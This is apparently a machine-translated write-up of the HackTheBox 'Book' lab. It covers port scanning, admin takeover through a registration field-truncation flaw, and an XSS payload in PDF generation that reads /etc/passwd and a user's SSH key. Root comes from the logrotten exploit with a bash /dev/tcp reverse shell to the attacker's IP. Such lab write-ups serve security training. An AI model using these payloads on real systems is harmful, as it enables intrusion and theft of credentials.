ITKarma picture

I continue to publish solutions sent for re-registration of vehicles from the HackTheBox site.

In this article, we are exploiting XSS to LFI through a PDF document, increasing privileges with logrotten, and also see why field-truncated registration is vulnerable.

Connection to the laboratory is via VPN. It is recommended not to connect from a work computer or from a host where the data important to you is available, as you end up on a private network with people who know something in the field of information security.

Organizational Information
So you can find out about new articles, software and other information, I created a channel in Telegram and the group to discuss any issues in the field of ICD. Also, your personal requests, questions, suggestions and recommendations I will personally consider and answer everyone .

All information is provided for educational purposes only. The author of this document does not bear any responsibility for any damage caused to someone as a result of using knowledge and methods obtained as a result of studying this document.

Recon


This machine has an IP address 10.10.10.176, which I add to/etc/hosts.

10.10.10.176 book.htb 

First, we scan open ports. Since it takes a long time to scan all nmap’s ports, I will first do this with masscan. We scan all TCP and UDP ports from the tun0 interface at a speed of 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.176 --rate=500 

ITKarma picture

Now, to get more detailed information about the services that run on ports, run a scan with the -A option.

nmap -A book.htb -p22,80 

ITKarma picture

The host runs the SSH service and the web server. Let's start with the web. We are met by the login and registration page.

ITKarma picture

Register and log in.

ITKarma picture

The site is a library with the ability to add books and contact the administrator.

ITKarma picture

No vector has been outlined in these fields, but we know the administrator’s mail. Let's iterate over directories using gobuster. In the parameters, specify the number of streams 128 (-t), URL (-u), dictionary (-w) and extensions that interest us (-x).

gobuster dir -t 128 -u http://book.htb/-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php 

ITKarma picture

Thus, we find many interesting pages, including the admin panel. Then it was decided to twist the authorization form, and immediately we find something interesting in the source code.

ITKarma picture

That is, the username cannot be longer than 10 characters, and the email address can be no more than 20. But verification occurs only in the case of empty fields, without checking the length.

Entry Point


So most likely these variables will be trimmed to the specified length on the server side. Let's check it out. Registering a user with an email address of more than 20 characters.

ITKarma picture

And then we will authorize, taking into account the truncated address.

ITKarma picture

ITKarma picture

As you can see, the assumption is true. Let's register as “admin@book.htb 123” and then log in as a regular admin.

ITKarma picture

ITKarma picture

ITKarma picture

This attack is possible due to the fact that during the check during registration the value “admin@book.htb 123” is absent in the database, after which it is truncated and overwrites the existing one. We look around the site and find nothing interesting but the collection.

ITKarma picture

After downloading and opening PDF documents, we find there a list of registered users and collections.

USER


My experience told me that when we deal with downloading information to a server and displaying it in PDF, you should check XXS to LFI. You can do this by downloading the following code.

<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script> 

We will go on behalf of a regular user and add a file to the collection, indicating this load in all fields.

ITKarma picture

Now download, download the file with the collection from the administrator, and find the contents of the/etc/passwd file there.

ITKarma picture

Let's read the private SSH key of the reader user, indicating in our load the file “file:///home/reader/.ssh/id_rsa”.

ITKarma picture

But when copying a key, it is not all copied. Open this pdf in the browser, copy the text and paste it into a regular text file, highlighting the first and last line.

ITKarma picture

Assign rights to this file.

chmod 0600 reader.key 

And connect via SSH.

ITKarma picture

ROOT


There is a backups folder in the user's home directory.

ITKarma picture

ITKarma picture

It didn’t give me anything. Run the scripts of the base enumeration of the system, we also find nothing interesting. In this case, we look at executable tasks using pspy64. And here we find logrotate running on behalf of the root.

ITKarma picture

Logrotate utility is designed to automate the processing of logs. She can perform the necessary actions with them, depending on certain conditions and compliance rules. For example, you can compress the logs to an archive or send them to another server when they reach a certain size, age, or other parameters. And Google search gives you something right away.

ITKarma picture

ITKarma picture

Download the repository and compile the program.

gcc -o logrotten logrotten.c 

Now make a file with reverse shell.

echo "bash -i >&/dev/tcp/10.10.15.60/4321 0>&1" > payloadfile 

Run logrotten, and in another terminal window, write to our log file.

./logrotten -p./payloadfile/home/reader/backups/access.log 

ITKarma picture

We can see that the program worked successfully.

ITKarma picture

After a few seconds, we see a connection that holds for a few seconds. This is enough to see the ssh private key.

ITKarma picture

Connect with this key and pick up the flag.

ITKarma picture

You can join us on Telegram . There you can find interesting materials, merged courses, as well as software. Let's put together a community in which there will be people who are versed in many areas of IT, then we can always help each other on any IT and information security issues.

Source